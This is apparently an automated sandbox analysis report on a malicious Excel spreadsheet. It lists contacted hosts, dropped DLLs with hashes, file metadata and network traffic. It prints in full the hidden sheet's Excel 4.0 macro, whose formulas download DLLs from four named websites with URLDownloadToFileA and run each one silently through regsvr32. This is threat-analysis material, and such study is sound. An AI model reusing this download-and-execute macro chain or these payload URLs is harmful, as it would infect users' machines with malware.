                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      https://165.22.73.229/5v | regsvr32.exe, 00000007.00000002.1219152991.000000000040E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      http://www.diginotar.nl/cps/pkioverheid0 | regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      https://165.22.73.229/KP | regsvr32.exe, 0000000B.00000002.1219537564.0000000002CC8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      http://ocsp.entrust.net0D | regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      https://secure.comodo.com/CPS0 | regsvr32.exe, 00000004.00000002.1219527866.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp | false | | high
                      https://165.22.73.229/=v | regsvr32.exe, 00000007.00000002.1219152991.000000000040E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      https://165.22.73.229:8080/1o | regsvr32.exe, 0000000B.00000002.1219557119.0000000002CE4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      http://crl.entrust.net/2048ca.crl0 | regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
85.114.142.153 | kolejleri.com | Germany | 24961 | MYLOC-ASIPBackboneofmyLocmanagedITAGDE | true
103.171.181.223 | learnviaonline.com | unknown | 7575 | AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | false
107.189.3.39 | milanstaffing.com | United States | 53667 | PONYNETUS | false
165.22.73.229 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
66.71.247.68 | stainedglassexpress.com | United States | 46562 | TOTAL-SERVER-SOLUTIONSUS | false
                              Joe Sandbox Version:34.0.0 Boulder Opal
                              Analysis ID:632071
Start date and time: 2022-05-23 09:09:54 +02:00
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 9m 49s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Sample file name:DETAILS 25922194612.xls
                              Cookbook file name:defaultwindowsofficecookbook.jbs
                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                              Number of analysed new started processes analysed:14
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.expl.evad.winXLS@18/18@5/5
                              EGA Information:
                              • Successful, ratio: 100%
                              HDC Information:
                              • Successful, ratio: 57.8% (good quality ratio 31%)
                              • Quality average: 32.8%
                              • Quality standard deviation: 37.5%
                              HCA Information:
                              • Successful, ratio: 95%
                              • Number of executed functions: 37
                              • Number of non-executed functions: 252
                              Cookbook Comments:
                              • Found application associated with file extension: .xls
                              • Adjust boot time
                              • Enable AMSI
                              • Found Word or Excel or PowerPoint or XPS Viewer
                              • Attach to Office via COM
                              • Scroll down
                              • Close Viewer
                              • Exclude process from analysis (whitelisted): dllhost.exe
                              • Excluded IPs from analysis (whitelisted): 173.222.108.226, 173.222.108.210, 95.140.230.192
                              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
09:10:28 | API Interceptor | 3713x Sleep call for process: regsvr32.exe modified
09:10:30 | API Interceptor | 443x Sleep call for process: svchost.exe modified
                              Process:C:\Windows\System32\regsvr32.exe
                              File Type:Microsoft Cabinet archive data, 61480 bytes, 1 file
                              Category:dropped
                              Size (bytes):61480
                              Entropy (8bit):7.9951219482618905
                              Encrypted:true
                              SSDEEP:1536:kmu7iDG/SCACih0/8uIGantJdjFpTE8lTeNjiXKGgUN:CeGf5gKsG4vdjFpjlYeX9gUN
                              MD5:B9F21D8DB36E88831E5352BB82C438B3
                              SHA1:4A3C330954F9F65A2F5FD7E55800E46CE228A3E2
                              SHA-256:998E0209690A48ED33B79AF30FC13851E3E3416BED97E3679B6030C10CAB361E
                              SHA-512:D4A2AC7C14227FBAF8B532398FB69053F0A0D913273F6917027C8CADBBA80113FDBEC20C2A7EB31B7BB57C99F9FDECCF8576BE5F39346D8B564FC72FB1699476
                              Malicious:false
                              Process:C:\Windows\System32\regsvr32.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):290
                              Entropy (8bit):2.9363699995422854
                              Encrypted:false
                              SSDEEP:6:kKnqoxN+SkQlPlEGYRMY9z+4KlDA3RUe/:vMkPlE99SNxAhUe/
                              MD5:66266C092C98169F6E97AC380BCF0A21
                              SHA1:473D9941B67B30B2123048912EEAA3F52EA1972B
                              SHA-256:52749029E461E7B4BD7A5D89ACF303535E71BE7A0ECA9553DF751A0F11647B51
                              SHA-512:B05210D71704F0B37074B58D2F4ED04B03A067D49F830117F2F5745FE136C89B40E7EAB61B471A103B399C539D73D18EC1506DF38731D260ABFE6A170A44D485
                              Malicious:false
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:downloaded
                              Size (bytes):371200
                              Entropy (8bit):7.1527203772082135
                              Encrypted:false
                              SSDEEP:6144:hlNuuXQASByX7YxoJcXy16qFHJ7wwD1w3pq6jTK/V9OT0u:hlNu9ASByX7Qy/BJ7rGTK/V3
                              MD5:828A9B1007DC45671D8A58E240C7C973
                              SHA1:8214993BB314D0F4C1889E507F88BEEB3F6E5B63
                              SHA-256:B59F16EE5E524814316A8BE8EF54EA02F9A496267555E65EEB585E4ADE85FFEC
                              SHA-512:7519B39DD811C3578E0002D5C4F35B2A6855092978004ECB2CA0030C1550AA3D38B346F83C43EB286AB9E1BF6209050078286DDB8BFEA5F1D5DC3EFCAAFEEEEF
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 59%
                              IE Cache URL:http://stainedglassexpress.com/classes/05SkiiW9y4DDGvb6/
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:downloaded
                              Size (bytes):371200
                              Entropy (8bit):7.152718217466625
                              Encrypted:false
                              SSDEEP:6144:hlNuuXQASByX7LxoJcXy16qFHJ7wwD1w3pq6jTK/V9OT0u:hlNu9ASByX7xy/BJ7rGTK/V3
                              MD5:646CA94D40F268C87215FFEA9FD0E826
                              SHA1:22E67EB4D6E4B5F09E3DE5A6021462ADCF99FE75
                              SHA-256:52769F52F479F16D61C449D307C7FD1FA23FAA0B5589500E0967CD7955CA93D6
                              SHA-512:5AE522EB99551146F84F9AA94F270083CEDC1BB8DF26697E15D57FCF7AF126766F8F18ED4FFAC06DF46D88E07C08A8523CD8A4187AF3DD8173BAF35272DE794B
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: Metadefender, Detection: 29%, Browse
                              • Antivirus: ReversingLabs, Detection: 61%
                              IE Cache URL:http://milanstaffing.com/images/D4TRnDubF/
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:downloaded
                              Size (bytes):371200
                              Entropy (8bit):7.152704988682108
                              Encrypted:false
                              SSDEEP:6144:hlNuuXQASByX7DxoJcXy16qFHJ7wwD1w3pq6jTK/V9OT0u:hlNu9ASByX7Zy/BJ7rGTK/V3
                              MD5:5A9E3E501F04B27A38BCA881A68A1785
                              SHA1:9573AB24845B8FA1408F0381E64A40A5CC2A879E
                              SHA-256:306C6E39327DAD93262B4531BA5B95B35F4541C70B0D4A6FE5F1DC8C96C86D8C
                              SHA-512:FB6BABA1B27D7019DA35D2CF854A111DEE6574196CC9E2022956ABDB3717B5C2321DC8811533205B3AA87A047AC6D927252688AAFAA802AFB989E38568C1EC58
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 59%
                              IE Cache URL:http://kolejleri.com/wp-admin/REvup/
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:downloaded
                              Size (bytes):371200
                              Entropy (8bit):7.1527177644825635
                              Encrypted:false
                              SSDEEP:6144:hlNuuXQASByX7fxoJcXy16qFHJ7wwD1w3pq6jTK/V9OT0u:hlNu9ASByX7ly/BJ7rGTK/V3
                              MD5:C9FD6F4A594719F21F310D8D0A2E55BB
                              SHA1:D999195E150304EF6FA4AE5362FDB70D0457429B
                              SHA-256:E654F14F3A98027669FD428597A2B4967B5276BDB94DA7770189E791FD98FC50
                              SHA-512:BC7F62214F70076027355858367004A019FBE18EE9404AC58ECC550C9EF5F2B3DB6A01E2B60A33E55B5FE323D52CD1BA0C455AA2C99E058140F9ABD5AF5B8E8E
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 59%
                              IE Cache URL:http://learnviaonline.com/wp-admin/qGb/
                              Process:C:\Windows\System32\regsvr32.exe
                              File Type:Microsoft Cabinet archive data, 61480 bytes, 1 file
                              Category:dropped
                              Size (bytes):61480
                              Entropy (8bit):7.9951219482618905
                              Encrypted:true
                              SSDEEP:1536:kmu7iDG/SCACih0/8uIGantJdjFpTE8lTeNjiXKGgUN:CeGf5gKsG4vdjFpjlYeX9gUN
                              MD5:B9F21D8DB36E88831E5352BB82C438B3
                              SHA1:4A3C330954F9F65A2F5FD7E55800E46CE228A3E2
                              SHA-256:998E0209690A48ED33B79AF30FC13851E3E3416BED97E3679B6030C10CAB361E
                              SHA-512:D4A2AC7C14227FBAF8B532398FB69053F0A0D913273F6917027C8CADBBA80113FDBEC20C2A7EB31B7BB57C99F9FDECCF8576BE5F39346D8B564FC72FB1699476
                              Malicious:false
                              Process:C:\Windows\System32\regsvr32.exe
                              File Type:data
                              Category:modified
                              Size (bytes):162196
                              Entropy (8bit):6.301436092020807
                              Encrypted:false
                              SSDEEP:1536:Nga6crtilgCyNY2Ip/5ib6NWdm1wpzru2RPZz04D8rlCMiB3XlMc:Na0imCy/dm0zru2RN97MiVGc
                              MD5:E721613517543768F0DE47A6EEEE3475
                              SHA1:3FFC13E3157CF6EB9E9CCAB57B9058209AF41D69
                              SHA-256:3163B82D1289693122EF99ED6C3C1911F68AA2A7296907CEBF84C897141CED4E
                              SHA-512:E097CAB58C5E390FDC2DB03A59329A548A60069804487828B70519A403622260E57F10B09D9DDAEEB3C31491FE32221FB67965C490771A3D42E45EBB8BE26587
                              Malicious:false
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):28672
                              Entropy (8bit):3.440608621024532
                              Encrypted:false
                              SSDEEP:768:cDRKpb8rGYrMPe3q7Q0XV5xtezE8vpI8UM+V0qs9s1X8:cVKpb8rGYrMPe3q7Q0XV5xtezE8vG8UU
                              MD5:A406AA1773C3292E4769B91791FEA502
                              SHA1:42B4155CFEAC777DD81ED4D6847BD29DF7D63810
                              SHA-256:1035D746F889351ED4258FBFC62EEDD75409A3CF4DEC52D81CE1C162CB5210DC
                              SHA-512:CCFC0521C6B9D6C67911139131AF133D7C7047CE3485526E7898B598ABB370587EA7DB8D006BE52274E92A744C5D812110FB4AD141D07C2B5966820AE3B83AA4
                              Malicious:false
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Dream, Last Saved By: TYHRETH, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Fri May 20 07:48:11 2022, Security: 0
                              Category:dropped
                              Size (bytes):69120
                              Entropy (8bit):6.427901607097409
                              Encrypted:false
                              SSDEEP:1536:aVKpb8rGYrMPe3q7Q0XV5xtezE8vG8UM+y9s1a6YG2jzQ0viPvDNHh9e6:4Kpb8rGYrMPe3q7Q0XV5xtezE8vG8UMs
                              MD5:0E2564F95F78ADB6AFF73888666FE471
                              SHA1:260A67566C40773895E2A062A205C3E67F6B388A
                              SHA-256:71F0E26B98B6FD162568CFAE666EAF0D043E7DD8BD9E2B7119D7C5944FF8B836
                              SHA-512:ACED75250CA50F8C81DD76D3FDCFA3F9471E0F6039BBF2B7920D201DFBA9E67834708CB9F7637A7B6D56898952FA6149EE353CC8BA99EF40312526F76507D0CB
                              Malicious:true
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):371200
                              Entropy (8bit):7.1527177644825635
                              Encrypted:false
                              SSDEEP:6144:hlNuuXQASByX7fxoJcXy16qFHJ7wwD1w3pq6jTK/V9OT0u:hlNu9ASByX7ly/BJ7rGTK/V3
                              MD5:C9FD6F4A594719F21F310D8D0A2E55BB
                              SHA1:D999195E150304EF6FA4AE5362FDB70D0457429B
                              SHA-256:E654F14F3A98027669FD428597A2B4967B5276BDB94DA7770189E791FD98FC50
                              SHA-512:BC7F62214F70076027355858367004A019FBE18EE9404AC58ECC550C9EF5F2B3DB6A01E2B60A33E55B5FE323D52CD1BA0C455AA2C99E058140F9ABD5AF5B8E8E
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 59%
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):371200
                              Entropy (8bit):7.152704988682108
                              Encrypted:false
                              SSDEEP:6144:hlNuuXQASByX7DxoJcXy16qFHJ7wwD1w3pq6jTK/V9OT0u:hlNu9ASByX7Zy/BJ7rGTK/V3
                              MD5:5A9E3E501F04B27A38BCA881A68A1785
                              SHA1:9573AB24845B8FA1408F0381E64A40A5CC2A879E
                              SHA-256:306C6E39327DAD93262B4531BA5B95B35F4541C70B0D4A6FE5F1DC8C96C86D8C
                              SHA-512:FB6BABA1B27D7019DA35D2CF854A111DEE6574196CC9E2022956ABDB3717B5C2321DC8811533205B3AA87A047AC6D927252688AAFAA802AFB989E38568C1EC58
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 59%
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):371200
                              Entropy (8bit):7.1527203772082135
                              Encrypted:false
                              SSDEEP:6144:hlNuuXQASByX7YxoJcXy16qFHJ7wwD1w3pq6jTK/V9OT0u:hlNu9ASByX7Qy/BJ7rGTK/V3
                              MD5:828A9B1007DC45671D8A58E240C7C973
                              SHA1:8214993BB314D0F4C1889E507F88BEEB3F6E5B63
                              SHA-256:B59F16EE5E524814316A8BE8EF54EA02F9A496267555E65EEB585E4ADE85FFEC
                              SHA-512:7519B39DD811C3578E0002D5C4F35B2A6855092978004ECB2CA0030C1550AA3D38B346F83C43EB286AB9E1BF6209050078286DDB8BFEA5F1D5DC3EFCAAFEEEEF
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 59%
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):371200
                              Entropy (8bit):7.152718217466625
                              Encrypted:false
                              SSDEEP:6144:hlNuuXQASByX7LxoJcXy16qFHJ7wwD1w3pq6jTK/V9OT0u:hlNu9ASByX7xy/BJ7rGTK/V3
                              MD5:646CA94D40F268C87215FFEA9FD0E826
                              SHA1:22E67EB4D6E4B5F09E3DE5A6021462ADCF99FE75
                              SHA-256:52769F52F479F16D61C449D307C7FD1FA23FAA0B5589500E0967CD7955CA93D6
                              SHA-512:5AE522EB99551146F84F9AA94F270083CEDC1BB8DF26697E15D57FCF7AF126766F8F18ED4FFAC06DF46D88E07C08A8523CD8A4187AF3DD8173BAF35272DE794B
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: Metadefender, Detection: 29%, Browse
                              • Antivirus: ReversingLabs, Detection: 61%
                              Process:C:\Windows\System32\regsvr32.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):371200
                              Entropy (8bit):7.152704988682108
                              Encrypted:false
                              SSDEEP:6144:hlNuuXQASByX7DxoJcXy16qFHJ7wwD1w3pq6jTK/V9OT0u:hlNu9ASByX7Zy/BJ7rGTK/V3
                              MD5:5A9E3E501F04B27A38BCA881A68A1785
                              SHA1:9573AB24845B8FA1408F0381E64A40A5CC2A879E
                              SHA-256:306C6E39327DAD93262B4531BA5B95B35F4541C70B0D4A6FE5F1DC8C96C86D8C
                              SHA-512:FB6BABA1B27D7019DA35D2CF854A111DEE6574196CC9E2022956ABDB3717B5C2321DC8811533205B3AA87A047AC6D927252688AAFAA802AFB989E38568C1EC58
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 59%
                              Process:C:\Windows\System32\regsvr32.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):371200
                              Entropy (8bit):7.1527203772082135
                              Encrypted:false
                              SSDEEP:6144:hlNuuXQASByX7YxoJcXy16qFHJ7wwD1w3pq6jTK/V9OT0u:hlNu9ASByX7Qy/BJ7rGTK/V3
                              MD5:828A9B1007DC45671D8A58E240C7C973
                              SHA1:8214993BB314D0F4C1889E507F88BEEB3F6E5B63
                              SHA-256:B59F16EE5E524814316A8BE8EF54EA02F9A496267555E65EEB585E4ADE85FFEC
                              SHA-512:7519B39DD811C3578E0002D5C4F35B2A6855092978004ECB2CA0030C1550AA3D38B346F83C43EB286AB9E1BF6209050078286DDB8BFEA5F1D5DC3EFCAAFEEEEF
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 59%
                              Process:C:\Windows\System32\regsvr32.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):371200
                              Entropy (8bit):7.1527177644825635
                              Encrypted:false
                              SSDEEP:6144:hlNuuXQASByX7fxoJcXy16qFHJ7wwD1w3pq6jTK/V9OT0u:hlNu9ASByX7ly/BJ7rGTK/V3
                              MD5:C9FD6F4A594719F21F310D8D0A2E55BB
                              SHA1:D999195E150304EF6FA4AE5362FDB70D0457429B
                              SHA-256:E654F14F3A98027669FD428597A2B4967B5276BDB94DA7770189E791FD98FC50
                              SHA-512:BC7F62214F70076027355858367004A019FBE18EE9404AC58ECC550C9EF5F2B3DB6A01E2B60A33E55B5FE323D52CD1BA0C455AA2C99E058140F9ABD5AF5B8E8E
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 59%
                              Process:C:\Windows\System32\regsvr32.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):371200
                              Entropy (8bit):7.152718217466625
                              Encrypted:false
                              SSDEEP:6144:hlNuuXQASByX7LxoJcXy16qFHJ7wwD1w3pq6jTK/V9OT0u:hlNu9ASByX7xy/BJ7rGTK/V3
                              MD5:646CA94D40F268C87215FFEA9FD0E826
                              SHA1:22E67EB4D6E4B5F09E3DE5A6021462ADCF99FE75
                              SHA-256:52769F52F479F16D61C449D307C7FD1FA23FAA0B5589500E0967CD7955CA93D6
                              SHA-512:5AE522EB99551146F84F9AA94F270083CEDC1BB8DF26697E15D57FCF7AF126766F8F18ED4FFAC06DF46D88E07C08A8523CD8A4187AF3DD8173BAF35272DE794B
                              Malicious:true
                              Antivirus:
                              • Antivirus: Metadefender, Detection: 29%, Browse
                              • Antivirus: ReversingLabs, Detection: 61%
                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Dream, Last Saved By: TYHRETH, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Fri May 20 07:48:11 2022, Security: 0
                              Entropy (8bit):6.4271376493454015
                              TrID:
                              • Microsoft Excel sheet (30009/1) 78.94%
                              • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                              File name:DETAILS 25922194612.xls
                              File size:69120
                              MD5:3cfaa4009799dc19f12161241bbf7b03
                              SHA1:f36b5b095c84f4cf7e01eaf23de008a3362843a8
                              SHA256:96eaa313abb56196eea9e8c4c20f78166b79894652e1cff740729d17aace22f0
                              SHA512:e238c7e2c0f14ec8c48faf424e187f9745bcbf94360759e521bc1a063f2d764514a4596709aa3cd645e5fd3f0e60fe510c3bfed7472fbd4a671de370098672e4
                              SSDEEP:1536:5VKpb8rGYrMPe3q7Q0XV5xtezE8vG8UM+y9s1a6YG2jzQ0viPvDNHh9e2:fKpb8rGYrMPe3q7Q0XV5xtezE8vG8UMU
                              TLSH:1A635B467A59C92DF914D33549D74BA97316FC318FAB0B833225B324AFFD8A05A0361B
                              Icon Hash:e4eea286a4b4bcb4
                              Document Type:OLE
                              Number of OLE Files:1
                              Has Summary Info:
                              Application Name:Microsoft Excel
                              Encrypted Document:False
                              Contains Word Document Stream:False
                              Contains Workbook/Book Stream:True
                              Contains PowerPoint Document Stream:False
                              Contains Visio Document Stream:False
                              Contains ObjectPool Stream:False
                              Flash Objects Count:0
                              Contains VBA Macros:False
                              Code Page:1251
                              Author:Dream
                              Last Saved By:TYHRETH
                              Create Time:2015-06-05 18:19:34
                              Last Saved Time:2022-05-20 06:48:11
                              Creating Application:Microsoft Excel
                              Security:0
                              Document Code Page:1251
                              Thumbnail Scaling Desired:False
                              Company:
                              Contains Dirty Links:False
                              Shared Document:False
                              Changed Hyperlinks:False
                              Application Version:1048576
                              General
                              Stream Path:\x5DocumentSummaryInformation
                              File Type:data
                              Stream Size:4096
                              Entropy:0.404258978601
                              Base64 Encoded:False
                              General
                              Stream Path:\x5SummaryInformation
                              File Type:data
                              Stream Size:4096
                              Entropy:0.290129672422
                              Base64 Encoded:False
                              General
                              Stream Path:Workbook
                              File Type:Applesoft BASIC program data, first line number 16
                              Stream Size:58563
                              Entropy:7.09409181726
                              Base64 Encoded:True
                              Name:PKEKPPGEKKPGE
                              Type:4
                              Final:False
                              Visible:False
                              Protected:False
                              PKEKPPGEKKPGE 4 False 0 False
                              pre
                              7,5,=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://learnviaonline.com/wp-admin/qGb/","..\uxevr1.ocx",0,0)",F11)
                              =FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx")",F13)
                              =FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://kolejleri.com/wp-admin/REvup/","..\uxevr2.ocx",0,0)",F15)
                              =FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx")",F17)
                              =FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://stainedglassexpress.com/classes/05SkiiW9y4DDGvb6/","..\uxevr3.ocx",0,0)",F19)
                              =FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx")",F21)
                              =FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://milanstaffing.com/images/D4TRnDubF/","..\uxevr4.ocx",0,0)",F23)
                              =FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx")",F25)
                              =FORMULA("=RETURN()",F29)
                              Name:PKEKPPGEKKPGE
                              Type:4
                              Final:False
                              Visible:False
                              Protected:False
                              PKEKPPGEKKPGE 4 False 0 False
                              post
                              7,5,=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://learnviaonline.com/wp-admin/qGb/","..\uxevr1.ocx",0,0)",F11)
                              =FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx")",F13)
                              =FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://kolejleri.com/wp-admin/REvup/","..\uxevr2.ocx",0,0)",F15)
                              =FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx")",F17)
                              =FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://stainedglassexpress.com/classes/05SkiiW9y4DDGvb6/","..\uxevr3.ocx",0,0)",F19)
                              =FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx")",F21)
                              =FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://milanstaffing.com/images/D4TRnDubF/","..\uxevr4.ocx",0,0)",F23)
                              =FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx")",F25)
                              =FORMULA("=RETURN()",F29)
                              10,5,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://learnviaonline.com/wp-admin/qGb/","..\uxevr1.ocx",0,0)
                              12,5,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx")
                              14,5,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://kolejleri.com/wp-admin/REvup/","..\uxevr2.ocx",0,0)
                              16,5,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx")
                              18,5,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://stainedglassexpress.com/classes/05SkiiW9y4DDGvb6/","..\uxevr3.ocx",0,0)
                              20,5,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx")
                              22,5,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://milanstaffing.com/images/D4TRnDubF/","..\uxevr4.ocx",0,0)
                              24,5,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx")
                              28,5,=RETURN()
                              Timestamp, Source Port, Dest Port, Source IP, Dest IP
                              May 23, 2022 09:10:54.142741919 CEST8049173103.171.181.223192.168.2.22
                              May 23, 2022 09:10:54.142824888 CEST4917380192.168.2.22103.171.181.223
                              May 23, 2022 09:10:54.143280983 CEST4917380192.168.2.22103.171.181.223
                              May 23, 2022 09:10:54.146006107 CEST8049173103.171.181.223192.168.2.22
                              May 23, 2022 09:10:54.146059990 CEST8049173103.171.181.223192.168.2.22
                              May 23, 2022 09:10:54.146188021 CEST4917380192.168.2.22103.171.181.223
                              May 23, 2022 09:10:54.312135935 CEST8049173103.171.181.223192.168.2.22
                              May 23, 2022 09:10:54.312165976 CEST8049173103.171.181.223192.168.2.22
                              May 23, 2022 09:10:54.312192917 CEST8049173103.171.181.223192.168.2.22
                              May 23, 2022 09:10:54.312211037 CEST8049173103.171.181.223192.168.2.22
                              May 23, 2022 09:10:54.312328100 CEST4917380192.168.2.22103.171.181.223
                              May 23, 2022 09:10:54.312897921 CEST8049173103.171.181.223192.168.2.22
